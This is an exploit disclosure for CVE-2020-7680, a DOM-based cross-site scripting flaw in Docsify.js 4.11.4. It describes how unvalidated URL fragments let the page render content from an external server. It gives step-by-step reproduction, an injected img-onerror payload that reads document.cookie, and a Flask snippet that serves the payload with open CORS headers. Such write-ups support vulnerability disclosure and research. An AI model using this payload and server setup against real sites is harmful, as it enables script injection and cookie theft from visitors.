# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting  
# Date: 2020-06-22  
# Exploit Author: Amin Sharifi  
# Vendor Homepage:  
# Software Link:  
# Version: 4.11.4  
# Tested on: Windows 10  
# CVE : CVE-2020-7680  
docsify.js uses fragment identifiers (parameters after # sign) to load  
resources from server-side .md files. it then renders the .md file inside  
the HTML page.  
For example : sends an ajax to and renders it inside the html page.  
due to lack of validation it is possible to provide external URLs after the  
/#/ and render arbitrary javascript/HTML inside the page which leads to  
DOM-based Cross Site Scripting (XSS).  
Steps to reproduce:  
step 1. setup a server (for example I use flask here, for the POC im  
hosting one on )  
step 2. the server should respond to request to / with a crafted  
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1  
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"  
also the CORS should be set so that other Origins would be able to send  
ajax requests to the server so Access-Control-Allow-Origin must be set to *  
(or to the specific domain that you wanna exploit) example code below:  
from flask import Flask  
import flask  
app = Flask(__name__)  
def inject():  
resp = flask.Response("Html Injection and XSS PoC</p><img src=1  
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")  
resp.headers['Access-Control-Allow-Origin'] = '*'  
return resp  
step 3. craft the link for execution of the exploit  
for example for website you can create the link as  
(note that the mentioned domain is no longer vulnerable at the time writing  
this report)  
when a user visits this URL an ajax request will be sent to and the response of the request will  
be rendered inside the webpage which results in XSS payload being executed  
on the page.  
snyk advisory:  
Mitre CVE entry: